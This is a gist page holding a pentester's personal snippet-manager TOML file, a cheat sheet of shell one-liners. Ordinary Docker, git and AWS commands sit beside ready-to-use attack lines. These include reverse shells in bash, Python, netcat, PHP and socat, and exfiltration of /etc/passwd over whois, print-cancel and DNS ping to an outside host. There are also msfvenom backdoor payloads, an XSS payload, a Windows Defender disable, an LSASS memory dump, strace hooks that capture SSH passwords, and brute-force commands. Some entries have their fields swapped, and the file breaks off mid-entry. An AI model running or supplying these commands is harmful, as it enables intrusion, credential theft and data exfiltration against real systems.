Skip to content

Instantly share code, notes, and snippets.

@ruevaughn
Forked from rhamaa/pet-snippet.toml
Created October 17, 2021 14:57
Show Gist options
  • Save ruevaughn/23f4299e499197111964c6764143b4d0 to your computer and use it in GitHub Desktop.
Save ruevaughn/23f4299e499197111964c6764143b4d0 to your computer and use it in GitHub Desktop.
description
[[snippets]]
description = "Python PTY Bash"
command = "python -c 'import pty; pty.spawn(\"/bin/bash\")'"
output = "\"\""
[[snippets]]
description = "[Reverse Shell] Socat Reverse Shell"
command = "socat file:`tty`,raw,echo=0 tcp-listen:<PORT=4444> #Listener socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<HOST>:<PORT=4444> #Victim"
output = "\"\""
[[snippets]]
description = "[Reverse Shell] Bash Reverse Shell"
command = "bash -i >& /dev/tcp/<HOST>/<PORT=2121> 0>&1"
output = "\"\""
[[snippets]]
description = "[Reverse Shell] Python Reverse Shell"
command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<HOST>\",<PORT=2121>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
output = "\"\""
[[snippets]]
description = "[Reverse Shell] Netcat Without -e Reverse Shell"
command = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <HOST> <PORT=2121> >/tmp/f"
output = "\"\""
[[snippets]]
description = "[Reverse Shell] PHP Reverse Shell"
command = "php -r '$sock=fsockopen(\"<HOST>\",<PORT=2121>);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
output = "\"\""
[[snippets]]
description = "[Misc] Increase Virtual Memory Size"
command = "sysctl -w vm.max_map_count=262144"
output = "\"\""
[[snippets]]
description = "[Wget] Wget Recursive Download"
command = "wget -r -e robots=off http://ezfile-sharing.wargames.my/.git"
output = "\"\""
[[snippets]]
description = "[GIT] Git hard reset .git to source codes have been rebuilt in the directory"
command = "git reset --hard"
output = "\"\""
[[snippets]]
description = "[Misc] Generate favicon hash"
command = "python3 -c \"import mmh3,sys;import requests;import codecs;response = requests.get(sys.argv[1]);favicon = codecs.encode(response.content,'base64');hash = mmh3.hash(favicon);print(hash)\""
output = "\"\""
[[snippets]]
description = "[Recon] Gau -subs"
command = "echo DOMAIN | gau -subs | grep -vE \"(\\.png|\\.jpg|\\.svg|\\.woff|\\.tff)\" | sort -u"
output = "\"\""
[[snippets]]
description = "[Recon] go-dork chained with nuclei"
command = "go-dork -q \"inurl:'/secure' intext:'jira' site:org\" -s | nuclei -t workflows/jira-workflow.yaml"
output = "\"\""
[[snippets]]
description = "[Dev] Gunicorn servce django project"
command = "gunicorn {{project_name}}.wsgi:application --bind 127.0.0.1:8083 --log-level=info --log-file=- --workers 2 --user=rhama"
output = "\"\""
[[snippets]]
description = "[GIT] List all cloned git directories on system"
command = "find / -name \".git\" -execdir git remote get-url origin \\; 2>/dev/null"
output = "\"\""
[[snippets]]
description = "[Docker] Delete all running and stopped containers"
command = "docker container rm -f $(docker ps -aq)"
output = "\"\""
[[snippets]]
description = "[Docker] Print the last 100 lines of a container’s logs"
command = "docker container logs --tail 100 {{container_name}}"
output = "\"\""
[[snippets]]
description = "[Docker] Remove all images"
command = "docker rmi -f $(docker images -a -q)"
output = "\"\""
[[snippets]]
description = "[Docker] Remove all unused data including: image, network, stop container"
command = "docker system prune"
output = "\"\""
[[snippets]]
description = "[Docker] Remove all untagged images"
command = "docker rmi $(docker images --filter \"dangling=true\" -q --no-trunc) --force"
output = "\"\""
[[snippets]]
description = "[Docker] Stop all running containers"
command = "docker stop $(docker ps -aq)"
output = "\"\""
[[snippets]]
description = "[OS] Set Multi-user Systemd Boot Target"
command = "sudo systemctl set-default multi-user.target"
output = "\"\""
[[snippets]]
description = "[Nmap] nmap verbose scan"
command = "nmap -v -sS -A -T4 <HOST>"
output = "\"\""
[[snippets]]
description = "[Find] Delete all .pyc files"
command = "find . -type f -name \"*.pyc\" | xargs rm -rf"
output = "\"\""
[[snippets]]
description = "[GIT] Undo git add before commit in specific filename"
command = "git reset filename"
output = ""
[[snippets]]
description = "[GIT] Unstage all changes"
command = "git reset"
output = ""
[[snippets]]
description = "XSSHunter Payload"
command = "\"><script src=https://htmlentities.xss.ht></script>"
output = ""
[[snippets]]
description = "[Socat] CTF Socket Listen"
command = "socat -d -d -d TCP4-LISTEN:60004,reuseaddr,fork EXEC:\"/usr/bin/python random-string-generator2.py\" > /dev/null 2>&1 &"
output = ""
[[snippets]]
description = "[Find] SUID Binary"
command = "find /* -user root -perm -4000 -print 2>/dev/null"
output = ""
[[snippets]]
description = "[Nmap] Simple Port Knocking"
command = "for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x <HOST>; done"
output = ""
[[snippets]]
description = "[Hydra] Brute force ssh with wordlist"
command = "hydra -L <user-list.txt> -P <password-list.txt> ssh://<HOST>"
output = ""
[[snippets]]
description = "[Hydra] Brute force ftp"
command = "hydra -V -l admin -P passwords.txt -e ns -f -s 21 <HOST> ftp"
output = ""
[[snippets]]
description = "[Android] Jarsigner build APK"
command = "jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 -keystore ~/.android/debug.keystore -storepass android <APK_NAME> androiddebugkey"
output = ""
[[snippets]]
description = "[Android] Zipalign APK"
command = "zipalign -v 4 <APK_NAME> <NEW_APK_NAME>"
output = ""
[[snippets]]
description = "[Frida] Hook Android Apps"
command = "frida -U -l <SCRIPT_NAME=crypto_hook.js> -p $(adb shell ps | grep -i <PACKAGE=com.finshell.fintech> | awk '{print $2}')"
output = ""
[[snippets]]
description = "[Reccon] Collecting urls + test ssrf"
command = "gau domain.com | urlive | grep -E '(callback=|jsonp=|api_key=|api=|password=|email=|emailto=|token=|username=|csrf_token=|unsubscribe_token=|p=|q=|query=|search=|id=|item=|page_id=|secret=|url=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_urllogin_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file=|cmd=|ip=|ping=|lang=|edit=|LoginId=|size=|signature=|passinfo=)' | qsreplace EnterYourBurpCollabrator | concurl"
output = ""
[[snippets]]
description = "[Mac] Enable ZSH Completion"
command = "autoload -Uz compinit && compinit"
output = ""
[[snippets]]
description = "[Mac] Disable Char Popup while holding key"
command = "defaults write -g ApplePressAndHoldEnabled -bool false"
output = ""
[[snippets]]
description = "[Mac] Enable Char Popup while holding key"
command = "efaults write -g ApplePressAndHoldEnabled -bool true"
output = ""
[[snippets]]
description = "[Python] Simple FTP Server"
command = "python3 -m pyftpdlib -p 21"
output = ""
[[snippets]]
description = "[MSF] Backdooring Apps"
command = "msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_ip_address> LPORT=<your unused port> -x <legitimate app> -k -o <output name>"
output = ""
[[snippets]]
description = "[Nmap] Script Vuln Scanning"
command = "nmap -Pn -sV -sC --script vuln -T4 <HOST>"
output = ""
[[snippets]]
description = "[Nmap] Decoy scan -D with list of live host"
command = "nmap –D 192.168.75.10,192.168.75.11,192.168.75.1,ME -p 80,21,22,25,443 -Pn <HOST>"
output = ""
[[snippets]]
description = "[Socat] Bind port to executable"
command = "socat TCP-LISTEN:5000,reuseaddr,fork EXEC:\"python3 main.py\""
output = ""
[[snippets]]
description = "[Android] Disable verify adb install"
command = "adb shell settings put global verifier_verify_adb_installs 0"
output = ""
[[snippets]]
description = "[Android] Disable package verify"
command = "adb shell settings put global package_verifier_enable 0"
output = ""
[[snippets]]
description = "[Nmap-SMB] SMB Enumeration"
command = "nmap –script=smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse 10.0.0.1"
output = ""
[[snippets]]
description = "[Nmap-Mysql] Mysql Enumeration"
command = "nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <HOST> -p 3306"
output = ""
[[snippets]]
description = "[Nmap-SMTP] SMTP Enumeration"
command = "nmap –script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 <HOST>"
output = ""
[[snippets]]
description = "[Recon-SNMP] SNMP Enumeration"
command = "snmpwalk -c public -v1 <HOST>"
output = ""
[[snippets]]
description = "[Nmap-FTP] FTP Enumeration:"
command = "nmap –script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 <HOST>"
output = ""
[[snippets]]
description = "[Hydra] Brute Force HTTP Form"
command = "hydra <HOST> http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin"
output = ""
[[snippets]]
description = "[Tunneling] Tunneling 10.10.10.0/24 throught 10.0.0.1"
command = "sshuttle -r [email protected] 10.10.10.0/24"
output = ""
[[snippets]]
description = "[Hashcat] Cracking md5"
command = "hashcat -m 500 -a 0 -o output.txt –remove hashes.txt /usr/share/wordlists/rockyou.txt"
output = ""
[[snippets]]
description = "[Nmap] General Enumeration (Verbose)"
command = "nmap -vv -Pn -A -sC -sS -T 4 -p- <HOST>"
output = ""
[[snippets]]
description = "[Openssl] Show expiration date of SSL certificate"
command = "echo | openssl s_client -connect <HOST>:443 2>/dev/null |openssl x509 -dates -noout"
output = ""
[[snippets]]
description = "[Recon-SMB] SMB Enumeration using enum4linux"
command = "enum4linux <HOST>"
output = ""
[[snippets]]
description = "[Aws] Get AWS Lambda Function"
command = "aws lambda get-function --function-name <FUNCTION=VulnerableFunction> --profile <PROFILE=LambdaReadOnlyTester> --region <REGION=us-east-2>"
output = ""
[[snippets]]
description = "[AWS] get list event that triggered <FUNCTION>"
command = "aws lambda list-event-source-mappings --function-name <FUNCTION=VulnerableFunction> --profile <PROFILE=LambdaReadOnlyTester>"
output = ""
[[snippets]]
description = "[AWS] Get lambda function policy"
command = "aws lambda get-policy --function-name <FUNCTION=VulnerableFunction> --profile <PROFILE=LambdaReadOnlyTester>"
output = ""
[[snippets]]
description = "[AWS] Perform Whoami to access key"
command = "aws sts get-caller-identity --profile <PROFILE>"
output = ""
[[snippets]]
description = "[Exfiltrate] Exfiltrate using cancel"
command = "cancel -u \"$(cat /etc/passwd)\" -h <HOST=hacking-for.fun:<PORT=2121>"
output = ""
[[snippets]]
description = "[Exfiltrate] Exfiltrate whois"
command = "whois -h <HOST=hacking-for.fun> -p <PORT=2121> `cat  /etc/passwd`"
output = ""
[[snippets]]
description = "[AWS] Get Policy Version Detail"
command = "aws iam get-policy-version --policy-arn <ARN=arn:aws:iam::838475217688:policy/LambdaReadOnlyTester> --version-id v1"
output = ""
[[snippets]]
description = "[Wget] Clone HTML Template"
command = "wget --recursive --no-clobber --page-requisites --html-extension --convert-links --restrict-file-names=windows --domains website.org --no-parent <WEBSITE>"
output = ""
[[snippets]]
description = "[AWS] Set IAM default policy version"
command = "aws iam set-default-policy-version --version-id v5 --policy-arn arn:aws:iam::838475217688:policy/cg-raynor-policy-cgidg7msogmyzq --profile raynor"
output = ""
[[snippets]]
description = "[AWS] Get Attached Policies on specific username"
command = "aws iam list-attached-user-policies --user-name <USERNAME> --profile raynor"
output = ""
[[snippets]]
description = "[AWS] Get User Information"
command = "aws iam get-user"
output = ""
[[snippets]]
description = "[Python] Simple FTP Server using pyftpdlib"
command = "python -m pyftpdlib -p 21 -w"
output = ""
[[snippets]]
description = "[Python] Simple HTTP Server using SimpleHTTPServer"
command = "python -m SimpleHTTPServer 80"
output = ""
[[snippets]]
description = "[AWS-Lambda] Get Lambda Function List"
command = "aws lambda list-functions --profile <PROFILE>"
output = ""
[[snippets]]
description = "[AWS-Lambda] Get Policy Of Function"
command = "aws lambda get-policy --function-name <FUNCTION>"
output = ""
[[snippets]]
description = "[GIT] Find the commit id of the commit that deleted your file"
command = "git log --diff-filter=D --summary"
output = ""
[[snippets]]
description = "[GIT] Restore Specific File from Commit"
command = "git checkout <COMMIT-HASH=81eeccf>~1 <your-lost-file-name>"
output = ""
[[snippets]]
description = "[GIT] Apply Specific File On Stash"
command = "git checkout stash@{<INDEX=0>} -- <filename>"
output = ""
[[snippets]]
description = "[Reccon] Scanning IP On The Network"
command = "netdiscover -i <INTERFACE=eth0>"
output = ""
[[snippets]]
description = "[GIT] Diff stash specific file"
command = "git diff stash@{0}^1 stash@{0} -- project/secure_code_platform/templates/core/exercise.html"
output = ""
[[snippets]]
description = "[Python] Pretty print json"
command = "python3 -m json.tool <JSON_FILE=exercises.json>"
output = ""
[[snippets]]
description = "[AWS] Get assume role of specific service"
command = "aws --profile test2 iam list-roles | jq -r '.Roles[] | select( .AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service' | grep -B 1 \"ec2.amazonaws.com\" | grep -v \"ec2.amazonaws.com\" |sort -u | uniq"
output = ""
[[snippets]]
description = "for i in $(cat /etc/passwd | fold -w 100 | xxd -ps); do ping $i.<domain=hacking-for.fun>;done"
command = "[Exfiltrate] DNS Exfiltrate Via Ping"
output = ""
[[snippets]]
description = "[AWS] Show UserData of EC2 Instance"
command = "aws ec2 describe-instance-attribute --attribute userData --instance-id i-0a0fd26b0e9fdd85b --profile student --region eu-west-2"
output = ""
[[snippets]]
description = "[CLI] Rot 13 Decode"
command = "echo \"AAA\" | tr 'A-Za-z' 'N-ZA-Mn-za-m'"
output = ""
[[snippets]]
description = "[ImageMagick] Compress Jpeg File"
command = "convert -strip -interlace Plane -gaussian-blur 0.05 -quality 85% <SRC=source.jpg> <DST=dst.jpg>"
output = ""
[[snippets]]
description = "[Powershell] Disable Windows Defender"
command = "Set-MpPreference -DisableRealtimeMonitoring $true"
output = ""
[[snippets]]
description = "[Windows-Wmic] Installed Security Patch List on machine"
command = "wmic qfe list"
output = ""
[[snippets]]
description = "[Windows-Wmic] Get Single Process PID"
command = "wmic process where \"name='<PROC_NAME=lsass.exe>'\" get processid"
output = ""
[[snippets]]
description = "[SSH] Forwarding local port to remote host"
command = "ssh -N -v -R <REMOTE_PORT>:<LOCAL_IP>:<LOCAL_PORT> [email protected]"
output = ""
[[snippets]]
description = "[Iptables] Allow only specific IP to DST Port"
command = "/sbin/iptables -A INPUT -p tcp ! -s <ALLOWED_IP=192.168.56.102> --dport <DST_PORT=8083> -j DROP"
output = ""
[[snippets]]
description = "[Iptables] DROP Incoming connection to DST_PORT"
command = "/sbin/iptables -A INPUT -p tcp --destination-port <DST_PORT=8080> -j DROP"
output = ""
[[snippets]]
description = "[Mac] Netstat linux like alternative"
command = "sudo lsof -i -n -P"
output = ""
[[snippets]]
description = "[Openssl] Use aes-128-cbc algorithm to encrypt files"
command = "openssl enc -e -aes-128-cbc -in abc.txt -out enc_abc.txt"
output = ""
[[snippets]]
description = "[Openssl] Use the aes-128-cbc algorithm to decrypt the file"
command = "openssl enc -d -aes-128-cbc -in enc_abc.txt -out abc.txt"
output = ""
[[snippets]]
description = "[Openssl] Use the aes-128-cbc algorithm to encrypt files without interactive input password"
command = "openssl enc -e -aes-128-cbc -in abc.txt -out enc_abc.txt -pass pass:123456"
output = ""
[[snippets]]
description = "[Openssl] Use encryption algorithm aes-256-cbc and password file to encrypt large files"
command = "openssl enc -aes-256-cbc -salt -in largefile.pdf -out largefile.pdf.enc"
output = ""
[[snippets]]
description = "[Mac] Monitoring File System Event"
command = "fs_usage -w -filesystem"
output = ""
[[snippets]]
description = "[Tshark] Logging DNS Query Name"
command = "tshark -Y \"udp.dstport==53\" -T fields -e \"dns.qry.name\""
output = ""
[[snippets]]
description = "[Docker] Inspect network on running container"
command = "docker inspect <CONTAINER=my-ubuntu> -f \"{{json .NetworkSettings.Networks }}\" | jq"
output = ""
[[snippets]]
description = "[MSF] Execute Windows Command - generate dll named shell32.dll that will pop calc when ran"
command = "msfvenom -f dll -p windows/exec CMD=\"C:\\windows\\system32\\calc.exe\" -o shell32.dll"
output = ""
[[snippets]]
description = "[MSF] Windows DLL with Windows cmd"
command = "msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll > shell-cmd.dll"
output = ""
[[snippets]]
description = "[MSF] Executable with Windows cmd"
command = "msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-cmd.exe"
output = ""
[[snippets]]
description = "[MSF] Executable with Meterpreter"
command = "msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-meterp.exe"
output = ""
[[snippets]]
description = "[MSF] Generate raw win 64 exec CMD"
command = "msfvenom -p windows/x64/exec CMD=<CMD=calc.exe> -f raw -o <NAME=shellcode.bin> -a x64"
output = ""
[[snippets]]
description = "[Windows] Dump process using a native comsvcs.dll"
command = "rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump <PID=624> <OUTPUT=C:\\temp\\lsass.dmp> full"
output = ""
[[snippets]]
description = "[Windows] Encode file using certutil format"
command = "certutil -encode <IN_FILE=shellcode.bin> <OUT_FILE=shellcode.encode>"
output = ""
[[snippets]]
description = "[AWS] Attach Instance Profile to EC2 Instance"
command = "aws ec2 associate-iam-instance-profile --iam-instance-profile Name=S3ReadOnlyAccess-Role --instance i-0fe5acf4cdf179193 --profile bt --region us-east-2"
output = ""
[[snippets]]
description = "[SSRF] Cloud Metadata"
command = "https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb"
output = ""
[[snippets]]
description = "[AWS] get inline role policy"
command = "aws iam get-role-policy --role-name <ROLE_NAME=Test-Role> --policy-name <POLICY_NAME=ExamplePolicy>"
output = ""
[[snippets]]
description = "[AWS] get role details"
command = "aws iam get-role --role-name <ROLE_NAME=Test-Role>"
output = ""
[[snippets]]
description = "[AWS] get managed policy list for specific role"
command = "aws iam list-attached-role-policies --role-name <ROLE_NAME=AWSServiceRoleForSupport>"
output = ""
[[snippets]]
description = "[AWS] get inline policies for specific role"
command = "aws iam list-role-policies --role-name <ROLE_NAME=Test-Role>"
output = ""
[[snippets]]
description = "[AWS] Get all instances status"
command = "aws ec2 describe-instances --query 'Reservations[*].Instances[*].[Placement.AvailabilityZone, State.Name, InstanceId]' --output text"
output = ""
[[snippets]]
description = "[AWS] VPC CidrBlock list"
command = "aws ec2 describe-vpcs --region us-east-2 --output table --query \"Vpcs[*].[CidrBlock,IsDefault,VpcId]\""
output = ""
[[snippets]]
description = "[AWS] EC2 List summary"
command = "aws ec2 describe-instances --query 'Reservations[*].Instances[*].[Placement.AvailabilityZone, State.Name, InstanceId, VpcId, NetworkInterfaces[*].Groups, PrivateIpAddress,PrivateDnsName, PublicIpAddress, PublicDnsName]' --region us-east-2 --output yaml"
output = ""
[[snippets]]
description = "[Recon] Collect All repository name github"
command = "for i in {1..9}; do curl -k \"https://github.com/<TARGET=kitabisa>?page=$i\" | grep '/<TARGET=kitabisa>' | grep mr-3 | awk '{print $2}' 2>/dev/null >> tmp; done && cat tmp | cut -d \"/\" -f 3 | sort -u > github-repo.txt"
output = ""
[[snippets]]
description = "[Payload] Java Runtime.exec sh command execute"
command = "sh -c $@|sh . echo ls -la / | nc <IP=hacking-for.fun> 2121"
output = ""
[[snippets]]
description = "[OS] Set time to use NTP"
command = "$ sudo apt install ntpdate $ sudo ntpdate -s ntp.ubuntu.com $ sudo dpkg-reconfigure tzdata"
output = ""
[[snippets]]
description = "[Windows] Start Applocker service"
command = "sc config \"AppIDSvc\" start=auto & net start \"AppIDSvc\""
output = ""
[[snippets]]
description = "[Nmap] Scanning large network using nmap : Scanning 676,352 IP Addresses in 46 Hours"
command = "https://nmap.org/book/mayo-scan.html"
output = ""
[[snippets]]
description = "Upgrading Simple Shells to Fully Interactive TTYs"
command = "https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/"
output = ""
[[snippets]]
description = "Kernel Module Reverse Shell"
command = "https://gist.githubusercontent.com/wifisecguy/b13adadbe67985804c3000c45521e2f7/raw/19d4a13cb9f55b253e7cf8ed9c4960d1a4920117/reverse-shell.c"
output = ""
[[snippets]]
description = "[AWS] View NACL on Specific Subnet"
command = "aws ec2 describe-network-acls --filter \"Name=association.subnet-id,Values=<SUBNET_ID=subnet-1ae9df57>\" --query NetworkAcls[].Entries --output table --color off"
output = ""
[[snippets]]
description = "[AWS] Summary of RDS instance"
command = "aws rds describe-db-instances --filter --query DBInstances[].[DBInstanceIdentifier,MasterUsername,DBSubn etGroup.VpcId,Endpoint.Address] --output=table --color off"
output = ""
[[snippets]]
description = "[AWS] Find VPC id by CIDR block"
command = "aws ec2 describe-vpcs --filter \"Name=cidrBlock,Values=<CIDR=172.31.0.0/16>\" --query Vpcs[].VpcId --output table --color off"
output = ""
[[snippets]]
description = "[AWS] Find all open outbond Security Groups"
command = "aws ec2 describe-security-groups --filter \"Name=egress.ip-permission.cidr,Values='0.0.0.0/0',Name=vpc-id,Values=<VPC_ID=vpc-96c34cfe>\" --output table --color off --query SecurityGroups[].GroupId"
output = ""
[[snippets]]
description = "[LINUX] Stop systemd-resolved"
command = "sudo systemctl disable systemd-resolved"
output = ""
[[snippets]]
description = "[AWS] Push public key to EC2 instance via EC2 connect"
command = "aws ec2-instance-connect send-ssh-public-key --instance-id <INSTANCE=i-0989ec3292613a4f9> --availability-zone <AVAILABILITY_ZONE=us-east-2b> --instance-os-user <USERNAME=ubuntu> --ssh-public-key file://id_rsa.pub --region us-east-2"
output = ""
[[snippets]]
description = "[AWS] Execute shell script on specific EC2 Instance via SSM"
command = "aws ssm send-command --document-name \"AWS-RunShellScript\" --document-version \"1\" --targets '[{\"Key\":\"InstanceIds\",\"Values\":[<INSTANCE_ID=\"i-049ce383acf05967d\">]}]' --parameters '{\"workingDirectory\":[\"\"],\"executionTimeout\":[\"3600\"],\"commands\":[\"echo \\\"Hello\\\" > /tmp/ssm_hello.txt\"]}' --timeout-seconds 600 --max-concurrency \"50\" --max-errors \"0\" --region us-east-2"
output = ""
[[snippets]]
description = "[Cheatsheet] SSRF Cheatsheet"
command = "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md"
output = ""
[[snippets]]
description = "[AWS] SSM Command result"
command = "aws ssm list-command-invocations --command-id <COMMAND_ID=ea37f13d-e4ef-48e4-87a0-0dc14d921266>"
output = ""
[[snippets]]
description = "[AWS] Get EC2 Instance ID"
command = "aws ec2 describe-instances --region us-east-1 --output table --query 'Reservations[*].Instances[*].InstanceId'"
output = ""
[[snippets]]
description = "[AWS] Create IAM role AssumeRole Policy"
command = "aws iam create-role --role-name <ROLE_NAME=EC2-Admin-Role> --assume-role-policy-document file://ec2-role-trust-policy.json"
output = ""
[[snippets]]
description = "[Reverse Shell] Bash reverse shell, please check existence of /dev/pts/X first"
command = "telnet 127.0.0.1 2121 0<<DEV_NAME_1=/dev/pts/0> | /bin/bash &><DEV_NAME_2=/dev/pts/2>"
output = ""
[[snippets]]
description = "[SSH] SSH Remote Port Forwarding"
command = "ssh -R <LOCAL_PORT=2121>:localhost:<SERVER_PORT=2121> do -v -N"
output = ""
[[snippets]]
description = "[Socat] Forward TCP Traffic to TARGET_SERVER"
command = "socat TCP4-LISTEN:2121,fork TCP4:<TARGET_SERVER=192.168.56.108:4782>"
output = ""
[[snippets]]
description = "[Misc] Backdooring stdin command using strace"
command = "alias <COMMAND=ssh>='strace -f -e trace=read,write -o /tmp/.ssh.log -s 32 ssh'"
output = ""
[[snippets]]
description = "[Misc] Record the plaintext password of the sshd process"
command = "sudo strace -f -F -p `ps aux|grep \"sshd -D\"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2>/tmp/sshd_log"
output = ""
[[snippets]]
description = "[Socat] Socat Cheatsheet"
command = "https://blog.travismclarke.com/post/socat-tutorial/"
output = ""
[[snippets]]
description = "[Socat] Debugging Unix Socket by forwarding"
command = "socat -v UNIX-LISTEN:/tmp/socat-listen UNIX-CONNECT:/path/to/real.socket"
output = ""
[[snippets]]
description = "[Socat] Listen to Port #nc alternative"
command = "socat TCP-LISTEN:<PORT=2121>,reuseaddr,pf=ip4,fork -"
output = ""
[[snippets]]
description = "[Linux] Log all stdout to file and send it to syslog"
command = "exec > >(tee /tmp/user-data.log|logger -t <TYPE=user-data> -s 2>/dev/console) 2>&1"
output = ""
[[snippets]]
description = "[Openssl] generate linux password"
command = "openssl passwd -1 password"
output = ""
[[snippets]]
description = "[Linux] Find File containing password"
command = "find / -maxdepth 4 -name '*.conf' -type f -exec grep -Hn 'pass\\|password\\|login\\|username\\|email\\|mail\\|host\\|ip' {} \\; 2>/dev/null"
output = ""
[[snippets]]
description = "nmap -sV -p 111 --script=rpcinfo $RHOST"
command = "[Nmap-NFS] Enumerate RPC NFS using nmap"
output = ""
[[snippets]]
description = "[GDB] Python script for side channel attack using gdb"
command = "https://gist.github.com/rhamaa/8e44db88eed2da0d259540b1362b29c4"
output = ""
[[snippets]]
description = "[Misc] Generate httpasswd password"
command = "echo \"admin:`openssl passwd -apr1 YourPassword`\" | sudo tee -a /etc/nginx/htpasswd.kibana"
output = ""
[[snippets]]
description = "[AWS] List all private AMI's, ImageId and Name tags"
command = "aws ec2 describe-images --filter \"Name=is-public,Values=false\" --query 'Images[].[ImageId, Name]' --output text | sort -k2"
output = ""
[[snippets]]
description = "[GIT] Checkout specifik file di commit ID"
command = "git checkout [commit ID] -- path/to/file"
output = ""
[[snippets]]
description = "[Wget] Download files recursively"
command = "wget -nd -np -P . -r -R \"index.html*\" http://mirror.myfahim.com/centos/7.9.2009/updates/x86_64/repodata/"
output = ""
[[snippets]]
description = "[Wget] Download files and directories recursively"
command = "wget $ wget -np -P . -r -R \"index.html*\" --cut-dirs=4 http://mirror.myfahim.com/centos/7.9.2009/updates/x86_64/"
output = ""
[[snippets]]
description = "[SED] remove empty lines"
command = "sed '/^$/d'"
output = ""
[[snippets]]
description = "[Misc] Split text file every n line nth line"
command = "for f in filename*.txt; do split -d -a1 -l10000 --additional-suffix=.txt \"$f\" \"${f%.txt}-\"; done"
output = ""
[[snippets]]
description = "[Linux] Remount root partition ro RW"
command = "mount -o remount,rw /"
output = ""
[[snippets]]
description = "[Linux-Misc] Load env variable from file"
command = "export $(cat creds/.inder.cred | xargs)"
output = ""
[[snippets]]
description = "Disabling the GUI/X/Head"
command = "systemctl set-default multi-user.target"
output = ""
[[snippets]]
description = "Enable the GUI/X/Head"
command = "systemctl set-default graphical.target"
output = ""
[[snippets]]
description = "[Linux] Create dummy file with size bs*count"
command = "dd if=/dev/zero of=/tmp/dummy.img bs=1024 count=120000"
output = ""
[[snippets]]
description = "[AWS] Get Public Exposed Outbound SG on VPC"
command = "aws ec2 describe-security-groups --filter \"Name=egress.ip- permission.cidr,Values='0.0.0.0/0',Name=vpc-id,Values=<VPC_ID=vpc-96c34cfe>\" --output table --color off --query SecurityGroups[].GroupId"
output = ""
[[snippets]]
description = "[Misc] Add Prefix string in file"
command = "sed -e 's/^/<prefix=PREFFIX>/g' <nama_file=subdomain.txt>"
output = ""
[[snippets]]
description = "Find All Allocated IP ranges for ASN given an IP address"
command = "whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net <Organization> | grep origin: | awk '{print $NF}' | head -1) | grep -w \"route:\" | awk '{print $NF}' | sort -n"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Android set proxy"
command = "adb shell settings put global http_proxy <ip address>:<param>"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Android unset proxy"
command = "adb shell settings put global http_proxy :0"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Brute forcing for endpoints with dirsearch"
command = "dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u <URL>"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "certprobe / runs httprobe on all the hosts from certspotter"
command = "curl -s https://crt.sh/\\?q\\=\\%.<domain>\\&output\\=json | jq -r '.[].name_value' | sed 's/\\*\\.//g' | sort -u | httprobe | tee -a ./all.txt"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Extract subdomains from IP Range"
command = "nmap <ip range> -sn | grep \"<greping domain>\" | awk '{print $5}'"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Find subdomain and takeover (with subfinder/amass/assetfinder/subjack)"
command = "subfinder -d <domain> >> domains ; assetfinder -subs-only <domain> >> domains ; amass enum -norecursive -noalts -d <domain> >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v | tee takeover"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Find LFI with gau"
command = "~/go/bin/gau <domain> | ~/go/bin/gf lfi | ~/go/bin/qsreplace \"/etc/passwd\" | xargs -I % -P 25 sh -c 'curl -s \"%\" 2>&1 | grep -q \"root:x\" && echo \"VULN! %\"'"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Find OpenRedirect with gau"
